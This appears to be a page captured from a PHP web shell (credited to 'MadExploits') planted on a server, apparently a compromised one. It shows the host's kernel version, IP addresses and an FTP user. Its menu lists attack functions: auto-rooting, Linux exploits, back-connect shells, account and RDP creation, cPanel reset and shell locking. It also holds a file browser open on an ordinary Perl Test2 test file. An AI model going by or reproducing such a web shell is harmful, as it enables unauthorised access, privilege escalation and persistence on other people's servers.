Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-Test-Simple /
t /
Test2 /
behavior /
[ HOME SHELL ]
Name
Size
Permission
Action
Formatter.t
1.64
KB
-rw-r--r--
Subtest_buffer_formatter.t
2.62
KB
-rw-r--r--
Subtest_callback.t
906
B
-rw-r--r--
Subtest_events.t
441
B
-rw-r--r--
Subtest_plan.t
355
B
-rw-r--r--
Subtest_todo.t
932
B
-rw-r--r--
Taint.t
356
B
-rw-r--r--
disable_ipc_a.t
203
B
-rw-r--r--
disable_ipc_b.t
219
B
-rw-r--r--
disable_ipc_c.t
256
B
-rw-r--r--
disable_ipc_d.t
458
B
-rw-r--r--
err_var.t
177
B
-rw-r--r--
init_croak.t
589
B
-rw-r--r--
intercept.t
1.09
KB
-rw-r--r--
ipc_wait_timeout.t
2.3
KB
-rw-r--r--
nested_context_exception.t
2.09
KB
-rw-r--r--
no_load_api.t
1.52
KB
-rw-r--r--
run_subtest_inherit.t
2.21
KB
-rw-r--r--
special_names.t
1.28
KB
-rw-r--r--
subtest_bailout.t
1.15
KB
-rw-r--r--
trace_signature.t
1.47
KB
-rw-r--r--
uuid.t
3.33
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : no_load_api.t
use strict; use warnings; use Data::Dumper; # HARNESS-NO-STREAM # HARNESS-NO-PRELOAD ############################################################################### # # # This test is to insure certain objects do not load Test2::API directly or # # indirectly when being required. It is ok for import() to load Test2::API if # # necessary, but simply requiring the modules should not. # # # ############################################################################### require Test2::Formatter; require Test2::Formatter::TAP; require Test2::Event; require Test2::Event::Bail; require Test2::Event::Diag; require Test2::Event::Exception; require Test2::Event::Note; require Test2::Event::Ok; require Test2::Event::Plan; require Test2::Event::Skip; require Test2::Event::Subtest; require Test2::Event::Waiting; require Test2::Util; require Test2::Util::ExternalMeta; require Test2::Util::HashBase; require Test2::EventFacet::Trace; require Test2::Hub; require Test2::Hub::Interceptor; require Test2::Hub::Subtest; require Test2::Hub::Interceptor::Terminator; my @loaded = grep { $INC{$_} } qw{ Test2/API.pm Test2/API/Instance.pm Test2/API/Context.pm Test2/API/Stack.pm }; require Test2::Tools::Tiny; Test2::Tools::Tiny::ok(!@loaded, "Test2::API was not loaded") || Test2::Tools::Tiny::diag("Loaded: " . Dumper(\@loaded)); Test2::Tools::Tiny::done_testing();
Close